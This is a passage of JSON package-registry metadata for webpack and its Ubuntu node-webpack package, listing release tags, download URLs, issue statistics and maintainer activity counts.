a":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T14:55:25.195Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/node-webpack?arch=source\u0026distro=ubuntu-23.10\u0026repository_url=https://launchpad.net/ubuntu/mantic","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.10","url":"https://launchpad.net/ubuntu/mantic","ecosystem":"ubuntu","default":false,"packages_count":36642,"maintainers_count":0,"namespaces_count":4,"keywords_count":2211,"github":"ubuntu","metadata":{"codename":"mantic","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1461},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.636Z","updated_at":"2026-09-02T05:06:11.115Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/namespaces"}},{"id":13400229,"name":"node-webpack","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-06T06:46:47.389Z","latest_release_published_at":"2026-02-06T06:46:47.389Z","latest_release_number":"5.76.1+dfsg1+~cs17.16.16-1","last_synced_at":"2026-03-06T07:05:01.597Z","created_at":"2026-02-06T06:46:47.113Z","updated_at":"2026-08-30T14:55:25.224Z","registry_url":"https://launchpad.net/ubuntu/+source/node-webpack","install_command":"apt-get install node-webpack","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"webpack","standards_version":"4.6.2","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-nodejs, dh-sequence-nodejs, jest (\u003e= 29) 